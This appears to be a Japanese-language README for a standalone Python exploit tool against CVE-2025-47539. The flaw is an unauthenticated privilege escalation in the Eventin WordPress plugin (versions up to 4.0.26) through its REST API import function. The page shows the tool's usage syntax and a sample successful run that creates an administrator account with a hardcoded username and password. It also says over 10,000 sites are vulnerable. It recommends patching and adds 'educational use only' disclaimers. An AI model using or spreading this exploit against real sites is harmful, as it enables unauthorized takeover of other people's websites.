
Eventin <= 4.0.26 - 認可欠如による未認証の権限昇格
WordPress 用プラグイン Event Manager, Events Calendar, Tickets, Registrations – Eventin は、import_items() 関数の認可チェックの欠如により、未認証の権限昇格に対して脆弱です。
<= 4.0.26CVE-2025-475399.8 (Critical)May 7, 2025May 15, 2025未認証の攻撃者は、REST API に対して悪意のあるリクエストを構築し、ユーザーの操作なしに administrator 権限を持つ新しいユーザーを作成できます。
この Python スクリプトは、CVE-2025-47539 用のスタンドアロン型エクスプロイトツールです。
実行内容:
⚠️ このスクリプトは教育目的および専門的なセキュリティ評価専用です。
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
このエクスプロイトに対して 10,000 以上 の WordPress サイトが脆弱であることが確認されています。
Eventin ≤ 4.0.26 を使用しているすべてのサイト管理者は、バージョン 4.0.28 以降に直ちに更新してください。
このツールは教育および許可されたペネトレーションテストのみを目的として提供されます。
作成者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。
作成者: Nxploited ( Khaled_Alenazi )
📧 連絡先: [email protected]